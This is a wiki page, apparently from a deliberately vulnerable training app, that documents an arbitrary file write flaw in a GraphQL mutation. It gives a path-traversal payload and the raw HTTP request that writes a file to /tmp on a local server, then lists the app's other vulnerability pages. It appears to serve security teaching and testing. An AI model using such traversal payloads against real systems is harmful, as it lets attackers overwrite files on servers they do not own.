-
Notifications
You must be signed in to change notification settings - Fork 178
GraphQL Arbitrary File Write
Sam Sanoop edited this page Dec 15, 2021
·
2 revisions
Arbitrary File Write allows attackers to traverse the file system to access files or directories that are outside of the restricted directory and write to files.
Within the GraphQL endpoint listening at port 4000, a mutation query called updateUserUploadFile
exists. This query can be accessed by any authenticated user and can be used to traverse the file system and write to files.
mutation {
updateUserUploadFile(filePath: "../../../../../../tmp/test.txt",fileContent:"foo")
{
filePath,
fileContent
}
}
Example Request
POST /graphql HTTP/1.1
Host: localhost:4000
User-Agent: curl/7.58.0
Accept: */*
content-type: application/json
Content-Length: 184
Connection: close
{"query": " mutation {\r\n updateUserUploadFile(filePath: \"../../../../../../tmp/test.txt\",fileContent:\"foo\")\r\n {\r\n\t\tfilePath,\r\n fileContent\r\n }\r\n \r\n \r\n}"}
- XML External Entity Injection
- Server Side Request Forgery (SSRF)
- Username Enumeration
- NoSQL Injection
- Insecure Direct Object Reference
- Mass Assignment
- Cross Site Scripting (XSS)
- Hidden API Functionality Exposure
- SQL Injection
- Information Disclosure
- Insecure PostMessage Configuration
- Command Injection
- Prototype Pollution
- JSON Hijacking
- XPath Injection
- Cross Origin Resource-Sharing Misonfiguration
- JWT Secret Key Brute Force
- Vertical Access Control
- Horizontal Access Control
- Open Redirect
- Path Traversal
- Unsafe Deserialization
- Sensitive Data Exposure
- Arbitrary File Write
- Introspection Enabled
- GraphQL Access Control Issues
- GraphQL Batching Brute Force
- Client Side Template Injection